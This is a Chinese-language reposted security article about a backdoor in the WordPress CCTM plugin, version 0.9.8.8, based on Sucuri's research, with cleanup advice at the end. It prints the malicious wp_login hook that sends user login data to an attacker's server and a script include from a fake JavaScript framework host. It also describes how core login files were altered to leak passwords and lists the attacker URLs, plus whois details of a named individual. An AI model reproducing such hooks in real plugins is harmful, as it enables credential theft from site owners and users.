WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码

  • 文章介绍
  • 评价建议
  • 温馨提示:
    本站为源代码分享站,源码多为网友投稿 我们没有对源码进行测试,不保证可用性、安全性以及版权归属。 因源码具有可复制性,一经购买 ,不得以任何形式退款。
    如需商业用途 请点击商业源码栏目,购买商业源码.
    客服QQ:977439673

    据悉, Sucuri安全团队研究人员近日指出WordPress一款插件(自定义内容管理)CCTM存在后门。通过该后门,可以对WordPress上的核心文件进行篡改,以此记录并窃取感染站点管理员用户的登录账号及密码。

    网络资源百科

    自定义内容管理( Custom Content Type Manager)插件的功能

    自定义内容类型管理(CCTM)允许用户创建自定义内容类型(也称为文章类型),也可以对每个下拉菜单、复选框和图像甚至于其他元素,提供标准化的自定义区域,这赋予了WordPress内容管理的功能。这个插件还允许导出和导入用户的内容定义,使得它易于在多个站点之间保证类似的结构。

    假如想为博客添加一个单独的部分来发表电影评论。通过使用自定义文章类型,你可以创建一种新的文章类型,就像文章(posts)和页面(pages)一样,它可以包含一组不同的数据。比如新的管理菜单、专门的编辑页面、自定义分类 和 更多实用的发布管理功能。自定义文字类型 拥有新的文章管理选项,就像默认的文章类型(文章、页面、附件 )一样。一种 自定义文章类型 可以存储各种各样的信息。它有专门的编辑器、多媒体上传 并使用WordPress现有的表结构,便于数据管理。

    后门的发现

    此事件是由Sucuri安全团队(一个专门提供web安全服务的团队)首次进行追踪分析的。据Sucuri安全研究人员提到,

    一开始他们是在其客户处发现一个命名奇怪的文件 (auto-update.php),而起初并没发现有可疑行为,直到该插件进行更新的时候。

    Sucuri安全团队提到当他们在为客户清除一个感染站点时,发现了一个可疑的文件auto-update.php,该文件是被存放在wp-content/plugins/custom-content-type-manager/.的路径下。具体如下图,

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源

    据研究分析,该后门程序,能从一个地址为http://wordpresscore .com/plugins/cctm/update/ 的服务端下载文件,并将它们保存为.php格式存放在插件配置目录下

    该插件既是上述提到的 Custom Content Type Manager (CCTM),在过去三年里该插件主要用于创建自定义文章类型,现在已经积累了一定的用户数量,据初步统计目前已经在超过10,000个站点上安装了该插件。

    插件疑云,神秘的管理者

    从 Sucuri安全团队两个星期的调查来看,该插件在过去的10个月将近一年看起来像一个被放弃的项目,并无任何更新,然而近期神秘地更换了管理者。而该名名为wooranker的新开发者随后更新了插件,发布了一个新的版本。

    我们在官方插件目录中找到的每一个WordPress插件,都是通过子版本存储库进行升级的。在问题跟踪系统的帮助下,任何人都可以使用该存储库去搜索相应的信息(包括像对象,时间以及变更事项等)在任意插件的任意版本中。比如,下图为近期CCTM更改的情况,

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源

    我们可以从上面截图看到,其中的一次更改是于2016年2月18日增加了auto-update.php文件。在此次更新中,“wooranker”改动并增加了下面的描述信息,

    “新管理者的小改动”(保留原始语法)

    实际上,从上述截图中我们可以看到,两个星期前该插件仍然由fireproofsocks在维持更新,但之后其中的一项变动的描述为“将wooranker增添到readme中”,再到后面就变成wooranker在对该插件进行更新了。

    或许该插件开发者已经对其失去兴趣,又或者受雇于wooranker。另一方面,因为实际上fireproofsocks已经将近一年没对该插件进行更新了,我们也推测是否 wooranke入侵了fireproofsocks的账户,随后增添了自身作为新的管理者。

    此外,在2016年2月5日,wooranker也同时加入到 Postie插件项目中。而其在Postie插件项目的变动都为合法可查的,并且都由Postie插件的初始发起人同意。这一切看起来却有点令人摸不清头脑。那么接下来让我们来看看更新的恶意CCTM插件及wooranker 如何使用它入侵站点的。

    自定义内容管理(CCTM)插件 0.9.8.8 版本存在恶意代码

    而该名开发者对于更新的版本赋予了其新的“使命”。首先,新的版本如上述所看到的,增加了auto-update.php的文件,而据研究分析,该文件可从远程的服务器下载指定文件到受感染的站点。

    通过Trac我们也看到了(于2月19日最后更新)。它增加了/includes/CCTM_Communicator.php文件(该文件会与auto-update.php联合运行,其主要的任务为ping wooranker的服务器端从而使得服务器能记录新感染的站点IP地址等信息。)以及将下述的代码段插入到插件的index.php文件中。

    // Send plugin information when user loginfunction _wp_login_eventhandler($user_login, $user) {require_once('includes/CCTM_Communicator.php');$_objCCTMCom = new CCTM_Communicator();$_objCCTMCom->addInfo(array($user_login, $user));$_objCCTMCom->send_info();}add_action('wp_login', '_wp_login_eventhandler', 10, 2);

    具体更改如下图,

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源

    该段代码作用为每当用户登录到WordPress站点时,将站点及用户的信息发送到wooranker的服务器(wordpresscore .com)上。

    攻击路径重演

    通过在受感染的站点上访问登陆,实现对攻击的回溯。

    于2月28日,从源地址104.131.27.120发起了尝试使用Python脚本 (“python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-79-generic“)登录到WordPress。该站点的地址明显地通过新的CCTM_Communicator功能来获取的。

    根据对受感染站点的监测,某次 wooranker企图登陆到一个受感染的站点,但由于站点管理员更改了登陆的URL,所以 wooranker未能成功入侵站点。随后看到尝试登陆受阻,wooranker也随即更改了策略。其利用auto-update.php后门,强制目标站点下载并安装另外一个名为c.php的文件,该文件主要用于创建另一名为wp-options.php的文件。后者主要用于篡改WordPress的核心文件。据研究发现,遭受篡改的主要有三个文件,

    1、wp-login.php,将管理员用户的登录凭证发送至hxxp://wordpresscore .com/in/login/index.php;

    2、wp-admin/user-new.php,窃取新创建的用户登录凭证,并将之发送至hxxp://wordpresscore .com/in/add-user/index.php;

    3、wp-admin/user-edit.php,当用户修改密码时,窃取相关登录凭证,并将之发送到hxxp://wordpresscore .com/in/pass-change/index.php。

    某些用户已自动更新至带有恶意代码的插件版本

    上述的这些功能已被合并进CCTM(自定义内容类型管理)插件,版本为0.9.8.8,而目前已经有许多用户安装该版本,或者自动更新到他们的站点。

    该名黑客针对核心WordPress文件的篡改,使得其能够控制用户登录、创建和编辑命令,同时在用户数据被加密之前将之拦截,并将用户的明文密码发送至服务器端。此外,wp-options.php甚至能在受感染的站点上创建管理员账户,一般以support为账户 / [email protected]为邮箱进行创建。

    综上的情况,wooranker可在所有受感染的站点上拥有管理员账户,当用户访问站点进行登录时,使用什么密码也会被通知到wooranker。

    黑客的真正身份?

    当我们在分析确认黑客身份的时候,还发现了插件更新上的一个变化。在wooranker获取插件管理者权限后,首先就是将donutjs(据其“官网”显示,其为js轻量级框架)引用到includes/CCTM.php文件中。

    wp_enqueue_script('donutjs', '//donutjs.com/jquery.js' );

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源
    可能对于很多人来说,几乎都没听过donutjs,甚至当你在搜索引擎上搜索的时候,也不会出现相关信息的检索结果。而根据分析检索,从其“官网”获知 donutjs是一个轻量级的框架,主要是为开发js应用提供支持,据其官网所称,其主要对标的是 jQuery。以下为其官网的地址(donutjs)及宣传。

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源

    与 jQuery语法的对比,举例如下图

    1、淡出元素并删除

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源
    2、调用ajax

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源
    而经过分析发现,上述提到的donutjs .com/jquery.js返回的信息却是为,

    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码
    WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码-网络资源

    该代码段也是用于收集记录站点地址的。

    接着我们还发现,wooranker实际上还掌控着donutjs .com的权限。当我们进行whois时,返回结果如下,

    wordpresscore .com

    创建时间: 2015-11-23

    注册姓名: Vishnudath Mangilipudi

    管理员所在地: Andhra Pradesh

    邮政编码: 524201

    管理员所在国家: IN

    管理员电话: +91.8985005295

    DNS服务器:

    NS1.DIGITALOCEAN.COM

    NS2.DIGITALOCEAN.COM

    NS3.DIGITALOCEAN.COM

    donutjs .com

    注册姓名: vishnudath

    管理员所在国家: IN

    管理员电话: +91.8985005295

    其实在这里,就可以看出donutjs应该就是wooranker用以辅助收集站点信息之用,所伪造出来的js框架。

    至于,从whois上的信息,我们可以发现,恶意代码中wordpresscore .com域名的实际拥有者是一名来自印度,名为Mangilipudi的开发者。但Sucuri安全团队尚不能确认Mangilipudi便是幕后的黑客,因为网络上个人身份信息可以被轻易窃取并伪造。而作为wooranker,如先前所述,他也是另外一个WordPress 插件 Postie的开发者和管理者,但Sucuri指出Postie目前仍然被最早的发起人管理着,并也没在其中发现恶意代码。所以,针对黑客的真正身份,目前仍在分析。

    建议

    1、停用CCTM 插件;

    2、检查所有的核心WordPress 文件,当然,用户除了可以重新安装WordPress达到该目的,至少应该确认以下三个文件是否遭受篡改,我们可以从以下地址获取初始文件,请点击:wordpress.org;

    (1) ./wp-login.php

    (2) ./wp-admin/user-edit.php

    (3) ./wp-admin/user-new.php

    3、修改WordPress上所有用户的密码;

    4、删除WordPress上无法识别的用户账号,特别是包含[email protected] .com邮箱信息的账户。

    5、如果确实需要在站点中维持CCTM插件,那么建议使用稳定版本0.9.8.6(版本0.9.8.7 已经发现有一个安全漏洞)。

    1 评论

    Leave a Reply

  • 如本资源侵犯了您的权益,[email protected]!我们将在收到邮件的1个小时内处理完毕。

  • 本站仅为平台,发布的资源均为用户投稿或转载!所有资源仅供参考学习使用,请在下载后的24小时内删除,禁止商用!

  • OKMG(芒果源码)助力正版,如您有自己的原创产品,可以联系客服投稿,代理出售!

  • OKMG(芒果源码)客服QQ:29139260

  • OKMG(芒果源码)商务电话(仅对企业客户/个人用户请联系QQ客服):010-86463891

  • 请注意:本站不提供任何免费的技术咨询服务,为了节约时间,下载前 请确认自己会技术
  • 免责声明 芒果源码,一个精品商业网站源码分享平台 WWW.OKMG.CN 1. 本站所有资源来源于用户上传和网络,均不允许转载,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除! 3. 如发现会员转载本站资源文章,本站有权封禁会员账号! 4. 不得使用于非法商业用途,不得违反国家法律。否则后果自负! 5. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 6. 如有链接无法下载、失效或广告,请联系管理员处理! 7. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 8. 如遇到加密压缩包,默认解压密码为"www.okmg.cn",如遇到无法解压的请联系管理员! 9.本站客服:29139260

    售后服务:

    • 售后服务范围 1、商业模板使用范围内问题免费咨询
      2、源码安装、模板安装(一般 ¥50-300)服务答疑仅限SVIP用户
      3、单价超过200元的模板免费一次安装,需提供服务器信息。
      付费增值服务 1、提供dedecms模板、WordPress主题、discuz模板优化等服务请详询在线客服
      2、承接 WordPress、DedeCMS、Discuz 等系统建站、仿站、开发、定制等服务
      3、服务器环境配置(一般 ¥50-300)
      4、网站中毒处理(需额外付费,500元/次/质保三个月)
      售后服务时间 周一至周日(法定节假日除外) 9:00-23:00
      免责声明 本站所提供的模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: [email protected]),我们会及时删除,给您带来的不便,我们深表歉意!

    Hi, 如果你对这款模板有疑问,可以跟我联系哦!

    联系客服
    开通VIP 享更多特权,建议使用 QQ 登录
    /** * 项目名称:用户离开标题切换 */